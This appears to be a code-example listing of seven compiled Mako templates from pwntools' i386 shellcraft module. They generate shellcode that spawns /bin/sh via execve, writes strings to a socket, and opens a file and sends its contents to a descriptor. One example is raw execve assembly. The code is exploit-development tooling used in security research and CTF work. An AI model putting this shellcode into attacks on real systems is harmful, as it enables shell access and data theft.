Beispiel #1
0
def render_body(context, **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.constants.linux.i386 import SYS_execve

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['SYS_execve']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        __M_writer(unicode(i386.pushstr('/bin///sh')))
        __M_writer(u'\n\n')
        __M_writer(unicode(i386.linux.syscall('SYS_execve', 'esp', 0, 0)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #2
0
def render_body(context, string, sock='ebp', **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs,
                                      sock=sock,
                                      string=string)
        len = context.get('len', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.constants.linux.i386 import SYS_write

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['SYS_write']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        __M_writer(unicode(i386.pushstr(string, append_null=False)))
        __M_writer(u'\n')
        __M_writer(
            unicode(i386.linux.syscall('SYS_write', sock, 'esp', len(string))))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #3
0
def render_body(context, value, **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs, value=value)
        int = context.get('int', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        long = context.get('long', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.util import packing

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['packing']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        import re

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['re']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n\n')
        if isinstance(value, (int, long)):
            __M_writer(u'    /* push ')
            __M_writer(unicode(repr(value)))
            __M_writer(u' */\n    ')
            __M_writer(
                unicode(
                    re.sub(
                        r'^\s*/.*\n', '',
                        i386.pushstr(packing.pack(value, 32, 'little', True),
                                     False), 1)))
            __M_writer(u'\n')
        else:
            __M_writer(u'    push ')
            __M_writer(unicode(value))
            __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #4
0
def render_body(context, filename, fd=1, **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs,
                                      fd=fd,
                                      filename=filename)
        __M_writer = context.writer()

        from pwnlib.shellcraft import i386
        from pwnlib.shellcraft import common

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386', 'common']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        label = common.label("sendfile_loop")

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['label']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n\n    ')
        __M_writer(unicode(i386.pushstr(filename)))
        __M_writer(u'\n    ')
        __M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
        __M_writer(u'\n    ')
        __M_writer(
            unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #5
0
def render_body(context, **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(pageargs=pageargs)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(
            u"\n\n\n    /*  Clear eax, ecx, edx */\n    xor eax, eax\n    push eax\n\n    /*  Push '/bin//sh' */\n"
        )
        __M_writer(unicode(i386.pushstr("/bin//sh")))
        __M_writer(
            u'\n    mov ecx, esp\n\n    /*  execve("/bin//sh", {junk, 0}, {0}); */\n    push eax\n    push esp\n    push esp\n    push ecx\n    push eax\n    mov al, SYS_execve\n    int 0x80\n\n'
        )
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #6
0
def render_body(context, reg, array, **pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(array=array, reg=reg, pageargs=pageargs)
        reversed = context.get('reversed', UNDEFINED)
        repr = context.get('repr', UNDEFINED)
        len = context.get('len', UNDEFINED)
        str = context.get('str', UNDEFINED)
        enumerate = context.get('enumerate', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        __M_writer = context.writer()
        from pwnlib.shellcraft import i386

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                              for __M_key in ['i386']
                              if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        if isinstance(array, (str)):
            array = [array]

        array_str = ''

        # Normalize all of the arguments' endings
        array = [arg.rstrip('\x00') + '\x00' for arg in array]
        array_str = ''.join(array)

        word_size = 4
        offset = len(array_str) + word_size

        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(
            __M_dict_builtin([
                (__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in
                ['word_size', 'array', 'offset', 'array_str', 'arg']
                if __M_key in __M_locals_builtin_stored
            ]))
        __M_writer(u'    /* push argument array ')
        __M_writer(unicode(repr(array)))
        __M_writer(u' */\n    ')
        __M_writer(unicode(i386.pushstr(array_str)))
        __M_writer(u'\n    ')
        __M_writer(unicode(i386.mov(reg, 0)))
        __M_writer(u'\n    push ')
        __M_writer(unicode(reg))
        __M_writer(u' /* null terminate */\n')
        for i, arg in enumerate(reversed(array)):
            __M_writer(u'    ')
            __M_writer(
                unicode(i386.mov(reg, offset + word_size * i - len(arg))))
            __M_writer(u'\n    add ')
            __M_writer(unicode(reg))
            __M_writer(u', esp\n    push ')
            __M_writer(unicode(reg))
            __M_writer(u' /* ')
            __M_writer(unicode(repr(arg)))
            __M_writer(u' */\n    ')
            offset -= len(arg)

            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(
                __M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
                                  for __M_key in ['offset']
                                  if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'    ')
        __M_writer(unicode(i386.mov(reg, 'esp')))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()
Beispiel #7
0
def render_body(context,path='/bin///sh',argv=0,envp=0,**pageargs):
    __M_caller = context.caller_stack._push_frame()
    try:
        __M_locals = __M_dict_builtin(path=path,pageargs=pageargs,envp=envp,argv=argv)
        dict = context.get('dict', UNDEFINED)
        isinstance = context.get('isinstance', UNDEFINED)
        list = context.get('list', UNDEFINED)
        str = context.get('str', UNDEFINED)
        tuple = context.get('tuple', UNDEFINED)
        __M_writer = context.writer()

        from pwnlib.shellcraft import i386, registers
        from pwnlib.abi import linux_i386_syscall as abi
        
        
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['abi','i386','registers'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        __M_writer(u'\n')
        __M_writer(u'\n')

        if isinstance(envp, dict):
            envp = ['%s=%s' % (k,v) for (k,v) in envp.items()]
        
        
        __M_locals_builtin_stored = __M_locals_builtin()
        __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['k','envp','v'] if __M_key in __M_locals_builtin_stored]))
        __M_writer(u'\n')
        if isinstance(argv, (list, tuple)):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[3], argv)))
            __M_writer(u'\n    ')
            argv = abi.register_arguments[3] 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['argv'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        if isinstance(envp, (list, tuple)):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr_array(abi.register_arguments[2], envp)))
            __M_writer(u'\n    ')
            envp = abi.register_arguments[2] 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['envp'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        if isinstance(path, str) and not registers.is_register(path):
            __M_writer(u'    ')
            __M_writer(unicode(i386.pushstr(path)))
            __M_writer(u'\n    ')
            path = 'esp' 
            
            __M_locals_builtin_stored = __M_locals_builtin()
            __M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['path'] if __M_key in __M_locals_builtin_stored]))
            __M_writer(u'\n')
        __M_writer(u'    ')
        __M_writer(unicode(i386.syscall('SYS_execve', path, argv, envp)))
        __M_writer(u'\n')
        return ''
    finally:
        context.caller_stack._pop_frame()